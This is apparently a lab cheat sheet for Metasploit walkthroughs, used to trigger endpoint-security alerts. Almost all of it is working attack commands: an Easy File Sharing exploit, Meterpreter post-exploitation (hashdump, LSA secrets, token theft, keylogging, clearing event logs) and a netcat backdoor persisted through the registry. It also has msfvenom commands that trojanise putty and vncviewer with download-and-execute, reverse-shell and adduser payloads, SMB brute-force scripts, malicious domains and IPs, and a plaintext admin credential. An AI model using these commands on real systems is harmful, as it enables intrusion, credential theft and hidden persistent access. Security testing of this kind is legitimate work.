Example 02: Meterpreter Walkthrough
(0) Cloud Lab
NAT 10.34.34.54
(1) Install Easy File Sharing Webserver 7.2
(https://vmoshpit.com/Malware/efssetup.exe.zip) on Windows and run as Administrator (or not)
(2) Run Exploit msf > use exploit/windows/http/easyfilesharing_post msf > set rhosts 192.168.2.215 msf > run
(3) Meterpreter meterpreter > background msf > sessions -l msf > sessions -i 1
System | meterpreter > shell meterpreter > steal_token meterpreter > upload /Pentest/Malware/Antivirus.exe meterpreter > execute -f Antivirus.exe meterpreter > clearev (Clear Event Logs)
Filesystem | meterpreter > lpwd (Print local wd) meterpreter > lls (List local files) meterpreter > edit (Edit a file) meterpreter > download (Download a file) meterpreter > search -f *.docx
Credentials | meterpreter > run post/windows/escalate/getsystem meterpreter > run post/windows/gather/hashdump meterpreter > run post/windows/gather/lsa_secrets
| meterpreter > use incognito meterpreter > list_tokens -u meterpreter > impersonate_token VMOSHPIT\Administrator meterpreter > getuid meterpreter > shell
Network | meterpreter > arp (Display ARP cache) meterpreter > ifconfig meterpreter > route meterpreter > run post/windows/recon/computer_browser_discovery
Gather Info | meterpreter > run post/windows/gather/checkvm meterpreter > sysinfo meterpreter > run post/windows/gather/enum_applications meterpreter > run post/windows/gather/enum_ad_computers meterpreter > run post/windows/gather/enum_av_excluded meterpreter > run winenum (Scrape everything - getsystem first) meterpreter > run post/multi/recon/local_exploit_suggester
Install Netcat Backdoor on Port 445 | meterpreter > upload /usr/share/windows-binaries/nc.exe C:\windows\system32
meterpreter > reg enumkey -k HKLM\software\microsoft\windows\currentversion\un
meterpreter > reg setval -k HKLM\software\microsoft\windows\currentversion\un -v nc -d 'C:\windows\system32\nc.exe -Ldp 666 -e cmd.exe'
meterpreter > execute -f cmd -i
netsh firewall show opmode netsh firewall add portopening TCP 666 "Service Firewall" ENABLE ALL netsh firewall show portopening nc -l 666
nc -lv 192.168.2.11 666
Keylogger **| ** meterpreter > keyscan_start meterpreter > keyscan_stop meterpreter > keyscan_dump meterpreter > screenshot
Control | meterpreter > uictl disable keyboard/mouse/all meterpreter > uictl enable keyboard/mouse/all meterpreter > run post/windows/manage/enable_rdp
(4) Windows CMD Create user 'Backup' and add to Admin Group |
net user Backup Password00-- /add /MaxPWAge:unlimited net localgroup Administratoren Backup /add net localgroup Remotedesktopbenutzer Backup /add
Start/Stop Services |
net stop "Windows-Firewall" net stop “Trend Micro Deep Security Agent”
Run as different user |
runas /user:vmoshpit\Administrator command
Print current ARP table |
arp -a
Edit ARP table and add entry |
arp -s 157.55.85.212 00-aa-00-62-c6-09
Create NFS share of Drive C and allow anonymous root access |
nfsshare FFA=C:\ -o anon=yes -o rw -o root
Create CIFS share and allow ananymous read/write access (+ delete) |
net share FFA=C:\ /grant:Jeder,FULL net share FFA /delete /y
Install Telnet Client | dism /online /Enable-Feature /FeatureName:TelnetClient
(5) Linux Shell Add user to sudoer
usermod -aG sudo Veeam
(6) MSFvenom
(a)** ****Create PE that downloads shellcode and executes it as new process. **Obfuscate it:
msfvenom --payload windows/download_exec URL=http://lxwo.org/venom.exe PrependMigrate=true PrependMigrateProc="Virus.exe" --platform windows --format exe --encoder x86/shikata_ga_nai -i 100 -x /Malware/putty.exe --out /void/Malware/LoJaxStager.exe
(b)** Use putty.exe as template to create new PE that opens Windows warning with text. Obfuscate it:**
msfvenom --payload windows/messagebox ICON=WARNING TEXT="Your files have been encrypted." TITLE="Hacked!" PrependMigrate=true --platform windows --format exe --encoder x86/shikata_ga_nai -i 100 -x /Malware/putty.exe --out /void/Malware/Vattenfall02.exe
(c)** **Use putty.exe as template to create new PE that creates new local Windows user account. Obfuscate it:
msfvenom --payload windows/adduser Hacker Hacker1234! --arch x86 --platform windows --format exe --encoder x86/shikata_ga_nai -i 100 -x /Malware/putty.exe --out /void/Malware/Skype.exe
**(d) **Use vncviewer as template to create new PE that connects Meterpreter via TCP to Attacker
msfvenom --payload windows/x64/meterpreter_reverse_tcp LHOST=192.168.2.222 LPORT=80 --arch x64 --platform windows --format exe --encoder x86/shikata_ga_nai -i 999 --encrypt base64 -x -k /usr/share/windows-binaries/vncviewer.exe --out /void/Malware/Demobackdoor.exe
(7) Metasploit Modules to trigger Deep Security
use auxiliary/scanner/smb/smb_login set user_as_pass true set user_file /void/wordlist.txt set rhost 192.168.2.215 set smbdomain vmoshpit
(8) Metasploit via CLI/Script
SMB Dictionary Attack
msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set user_as_pass true; set user_file /void/Wordlists/Probable-Wordlists/Real-Passwords/Top1575-probable-v2.txt; set rhost 192.168.2.215; set smbdomain vmoshpit; run; exit -y”
SMB Dictionary Attack (with useless ‘echo’) #!/bin/bash echo "[+] Downloading Wordlist." echo "[*] Scanning Ports." nmap -T5 -Pn -p445 --open 192.168.2.215 echo "[!] Found vulnerable SMB share." echo "[+] Loading Dictionary Attack." wget -q http://vmoshpit.com/Malware/Wordlists/fasttrack.txt /void/
msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set user_as_pass true; set user_file /void/fasttrack.txt; set rhost 192.168.2.215; set smbdomain vmoshpit; run; exit -y"
rm /void/fasttrack.txt echo "[+] Successfully compromised Host.”
Apex VP Trigger:
1009549 - Detected Terminal Services (RDP) Server Traffic - 1 (ATT&CK T1015,T1043,T1076)
msfconsole -q -x "use scanner/rdp/cve_2019_0708_bluekeep; set rhost 192.168.2.130; run; exit -y"
Apex VP Trigger:
1008227 - Microsoft Windows SMB Information Disclosure Vulnerability (CVE-2017-0147)
1005448 - SMB Null Session Detected - 1
msfconsole -q -x "use auxiliary/scanner/smb/smb_ms17_010; set rhost 192.168.2.130; run; exit -y"
Exploit Easy File Sharing App
msfconsole -q -x "use exploit/windows/http/easyfilesharing_seh; set rhosts 192.168.2.215; run"
Windows PEs on Kali: /usr/share/windows-binaries/
Payloads to trigger ATSE ---------------------------------------- secao.org ikmtrust.com sysanalyticweb.com lxwo.org jflynci.com remotepx.net rdsnets.com rpcnetconnect.com webstp.com elaxo.org 185.77.129.106 185.144.82.239 93.113.131.103 185.86.149.54 185.86.151.104 103.41.177.43 185.86.148.184 185.94.191.65 86.106.131.54
Known bad file Hashes 1771e435ba25f9cdfa77168899490d87681f2029
OpenVAS in Cloud Lab https://192.168.2.222:9392 admin:bbbe3b76-1c5d-484e-a75c-c48ef07f92d3